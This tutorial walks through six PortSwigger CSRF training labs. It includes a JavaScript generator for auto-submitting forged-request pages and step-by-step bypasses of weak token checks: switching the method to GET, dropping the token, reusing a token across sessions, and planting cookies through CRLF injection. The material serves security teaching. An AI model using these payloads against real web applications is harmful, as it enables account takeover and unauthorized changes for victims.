Mastering CSRF: Uncover and Exploit Hidden Web Vulnerabilities
What is Cross-Site Request Forgery (CSRF)?
Cross-Site Request Forgery (CSRF) is a web vulnerability that lets an attacker make a victim's browser send a request the victim never intended to a web application where they are already logged in. Because the browser automatically attaches the victim's session cookie to that request, the application treats the forged request as a legitimate one, which can result in unauthorized changes or transactions.
The Impact of CSRF Vulnerabilities
When a CSRF attack succeeds, the consequences depend on what the forged request is able to do, and can include:
- Altering user passwords
- Transferring funds from accounts
- Changing email addresses linked to accounts
- Hijacking user accounts
- Gaining full control of an application if the user has high privileges
Exploiting CSRF Vulnerabilities: Hands-On Examples
Let’s explore practical examples of CSRF exploitation using PortSwigger labs.
Lab 1: CSRF with No Defenses
In this lab, we start by logging in with the given credentials. We then navigate to the email change function and update the email address. Inspecting the captured request shows that it carries no CSRF token and relies only on the session cookie, so we generate a CSRF Proof of Concept (PoC) HTML page using the "Generate CSRF PoC" option in Burp's engagement tools.
The generated HTML script contains a form that submits a POST request to change the email address. Key parts of the script include:
- The “action” attribute, which specifies the URL for the request
- The “method” attribute, set to “POST” since we’re updating information
- The “input type” set to “hidden” to conceal the new email value from the user
- The "submit" button (or the auto-submit script, if that option is selected), which sends the request when the victim visits the page
After storing the page on the exploit server and delivering it to the victim, the lab is successfully completed.
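The PoC that Burp generates is ordinary HTML. The following is an added example, not code from the original article or from PortSwigger, that builds the same kind of page from a captured request so the parts listed above can be seen together. The lab hostname, the path and the parameter name are placeholders that mirror the email-change form; substitute the values from the real captured request.

```javascript
// Added example: build a CSRF proof-of-concept page of the shape Burp's
// "Generate CSRF PoC" emits. Target URL and field names are assumptions.
const escapeAttr = (s) =>
  String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);

function buildCsrfPoc(action, fields, { method = 'POST', autoSubmit = true } = {}) {
  // Every captured body parameter becomes a hidden input, so the victim sees
  // nothing but (at most) a submit button. Values are attribute-escaped so a
  // quote inside a parameter value cannot break out of the form markup.
  const inputs = Object.entries(fields)
    .map(([name, value]) =>
      `    <input type="hidden" name="${escapeAttr(name)}" value="${escapeAttr(value)}" />`)
    .join('\n');
  // With method="GET" the browser appends the fields to the URL as a query
  // string, which is the form the request takes once the method is switched.
  const submit = autoSubmit ? '  <script>document.forms[0].submit();</script>' : '';
  return [
    '<html>',
    '  <body>',
    `  <form action="${escapeAttr(action)}" method="${method}">`,
    inputs,
    '    <input type="submit" value="Submit request" />',
    '  </form>',
    submit,
    '  </body>',
    '</html>',
  ].filter(Boolean).join('\n');
}

// Constructed sample matching the Lab 1 flow: only the email parameter, no token.
const LAB1_POC = buildCsrfPoc(
  'https://YOUR-LAB-ID.web-security-academy.net/my-account/change-email',
  { email: 'attacker@evil-user.net' },
);
```

The auto-submit script is what turns "the victim visits a page" into "the victim's browser sends the request"; without it the victim would have to click the button. Host the returned string on the exploit server exactly as Burp's output would be.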
Lab 2: CSRF with Token Validation Depending on Request Method
Here, the server issues a CSRF token and validates it, but only for POST requests. A PoC that submits a POST without a valid token is rejected. Changing the form method to GET (so the parameters travel in the query string) and dropping the token parameter bypasses the check entirely, because the server never validates tokens on GET, and the lab is solved.
Lab 3: CSRF with Token Validation Depending on Token Presence
In this scenario, the server validates the token correctly when the csrf parameter is present, but skips validation altogether when the parameter is missing. Removing the token parameter from the PoC form, rather than sending an invalid value, is enough to exploit the vulnerability and complete the lab.
Lab 4: CSRF with Token Not Tied to User Session
In this lab, the server checks that the token is one it issued, but not that it belongs to the session making the request. We log in with our own account, intercept the email-change request, copy the fresh CSRF token out of it and drop the request so that the token is not consumed, then place that token in the PoC delivered to the victim. The server accepts the victim's session cookie together with our token, which shows how tokens not tied to a session can be misused.
Lab 5: CSRF with Token Tied to Non-Session Cookie
This scenario involves a CSRF token tied to a separate csrfKey cookie rather than to the session cookie. A request passes if the csrfKey cookie and the csrf parameter form a matching pair, so we take a valid pair from our own session. A cross-origin page cannot set cookies on the target directly, so we use the site's own cookie-setting behaviour: the search term is reflected into a Set-Cookie header, and a CRLF sequence injected into it lets us plant our csrfKey cookie in the victim's browser. The PoC first loads that search URL, then submits the form carrying our token, and the forged request is accepted.
Lab 6: CSRF with Token Duplicated in Cookie
In this final lab, the CSRF token is duplicated in a cookie and the server merely checks that the csrf parameter matches the csrf cookie, holding no server-side copy. Any value works as long as the two agree, so we plant a cookie of our choosing through the same cookie-setting behaviour in the search function and submit the form with the identical value as the csrf parameter, successfully exploiting the vulnerability.
Conclusion
Understanding how CSRF is exploited is vital for both offensive and defensive work: each bypass above corresponds to a specific validation mistake. By working through these practical examples, security professionals can better identify those mistakes and build token checks that avoid them.
For further reading, check out the PortSwigger CSRF documentation.